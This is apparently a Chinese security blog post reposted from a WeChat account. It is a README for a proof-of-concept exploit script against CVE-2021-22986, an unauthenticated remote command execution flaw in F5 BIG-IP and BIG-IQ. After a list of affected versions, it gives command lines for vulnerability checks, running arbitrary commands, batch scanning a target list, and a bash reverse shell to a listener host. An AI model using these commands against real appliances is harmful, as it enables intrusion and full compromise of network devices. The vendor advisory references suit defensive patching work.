CVE - 2021 -22986 POC

  • A+
所属分类:安全文章

自述文件

此漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址访问iControl REST接口,从而可以执行任意系统命令,创建或删除文件以及禁用服务。此漏洞只能通过控制平面利用,而不能通过数据平面利用。剥削可能导致完全的系统危害。设备模式下的BIG-IP系统也容易受到攻击。

影响产品

  • F5 BIG-IQ 6.0.0-6.1.0

  • F5 BIG-IQ 7.0.0-7.0.0.1

  • F5 BIG-IQ 7.1.0-7.1.0.2

  • F5 BIG-IP 12.1.0-12.1.5.2

  • F5 BIG-IP 13.1.0-13.1.3.5

  • F5 BIG-IP 14.1.0-14.1.3.1

  • F5 BIG-IP 15.1.0-15.1.2

  • F5大IP 16.0.0-16.0.1

Vunl Check

基本用法

python3 CVE_2021_22986.py


CVE - 2021 -22986 POC


外部扫描

python3 CVE_2021_22986.py -v true -u https://192.168.174.164

CVE - 2021 -22986 POC

命令执行:

python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id

CVE - 2021 -22986 POC

python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami

CVE - 2021 -22986 POC

批量扫描

python3 CVE_2021_22986.py -s true -f check.txt

CVE - 2021 -22986 POC

备用壳

python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"

CVE - 2021 -22986 POC

CVE - 2021 -22986 POC

新POC

python3 newpoc.py https://192.168.174.164

CVE - 2021 -22986 POC

参考

  • https://support.f5.com/csp/article/K03009991

  • https://github.com/safesword/F5_RCE

  • https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986


CVE - 2021 -22986 POC

本文始发于微信公众号(Ots安全):CVE - 2021 -22986 POC

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: